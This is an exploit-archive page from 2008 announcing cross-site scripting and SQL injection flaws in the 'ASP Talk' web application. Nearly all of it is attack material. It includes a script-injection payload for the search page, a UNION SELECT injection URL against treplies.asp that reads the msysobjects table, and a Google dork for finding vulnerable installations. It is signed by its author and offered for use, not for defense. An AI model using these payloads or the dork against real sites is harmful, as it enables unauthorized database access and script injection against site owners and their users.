[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ASP Talk (SQL/CSS) Multiple Remote Vulnerabilities
# Published : 2008-12-07
# Author : Bl@ckbe@rD
# Previous Title : ASP AutoDealer Remote Database Disclosure Vulnerability
# Next Title : ASP PORTAL (xportal.mdb) Remote Database Disclosure Vulnerability
000000 00000 0000 0000 000 00 000000 0000000 0000 000000 00000
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 00 0 0 0 0 0 0 0 0 00 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
00000 0 0 0 0 0 0 0 0 00000 0000 0 0 0 0 00000 0 0
0 0 0 0 0 0 0 0 000 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 000 0 0 0 0 0 0 0 000 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
000000 0000000 000 0000 000 00 000000 0000000 000 000 00 00000
[+] Script : ASP Talk
[+] Exploit Type : Multiple Exploits (SQL/CSS)
[+] Google Dork : inurl:treplies.asp?message= intitle:ASP Talk
[+] Contact : blackbeard-sql A.T hotmail.fr
--//--> Exploit :
1)Cross site scripting :
http://[website]/[script]/search.htm
post = <script>alert('Bl@clbe@rD Is Here')</script>
2) Remote sql injection Exploit :
http://[website]/[script]/treplies.asp?message=20814+union+select+1,2,3,4,5,6,7,8+from+msysobjects
[peace xD]
# www.Syue.com [2008-12-07]